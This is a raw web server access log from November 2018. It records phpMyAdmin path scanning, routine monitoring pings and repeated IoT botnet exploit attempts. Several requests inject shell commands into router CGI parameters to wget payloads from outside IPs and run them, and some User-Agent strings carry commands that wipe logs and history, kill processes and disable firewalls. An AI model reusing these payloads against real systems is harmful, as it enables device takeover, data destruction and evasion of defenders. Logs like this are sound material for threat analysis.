132.232.3.60 - - [01/Nov/2018:09:55:59 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:02 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:03 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:03 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:04 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:05 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:06 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:06 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:07 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:07 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:07 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:08 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:10 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:11 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:11 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:11 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:11 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:12 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:13 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:13 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:15 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:15 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:15 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:15 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:16 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:16 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:16 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:17 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:18 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:18 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:19 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:19 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:19 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:19 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:20 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:20 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:20 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:21 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:23 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:23 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:23 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:23 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:24 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:24 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:24 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:25 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:25 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:26 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:27 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:27 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:27 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:56:27 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:09:56:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.244.142.251 - - [01/Nov/2018:09:57:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:09:57:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:58:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.210.169.26 - - [01/Nov/2018:09:59:15 +0100] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1" 400 329 "-" "Dark"
212.91.246.72 - - [01/Nov/2018:09:59:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
160.19.224.184 - - [01/Nov/2018:10:00:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:10:00:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:01:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:02:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.36.92.181 - - [01/Nov/2018:10:02:56 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:04:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:05:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:06:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:07:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:08:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:09:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:10:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.211.191.7 - - [01/Nov/2018:10:11:32 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.106.251/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:10:11:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:12:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.237.83.179 - - [01/Nov/2018:10:13:07 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:13:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.125.52.156 - - [01/Nov/2018:10:14:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.19.180 - - [01/Nov/2018:10:14:56 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
156.221.203.140 - - [01/Nov/2018:10:15:02 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:15:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:16:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.122.55 - - [01/Nov/2018:10:16:54 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:17:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.47.154.179 - - [01/Nov/2018:10:19:10 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:19:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.187.220.73 - - [01/Nov/2018:10:20:13 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 329 "-" "LMAO/2.0"
212.91.246.72 - - [01/Nov/2018:10:20:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.221.203.140 - - [01/Nov/2018:10:23:26 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:23:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.122.55 - - [01/Nov/2018:10:24:06 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:24:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:25:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:26:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.28.154.11 - - [01/Nov/2018:10:27:42 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://94.177.216.74/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:10:27:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:28:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:29:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.32.184.210 - - [01/Nov/2018:10:30:20 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:10:30:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.131.67.112 - - [01/Nov/2018:10:31:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 329 "-" "LMAO/2.0"
212.91.246.72 - - [01/Nov/2018:10:31:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
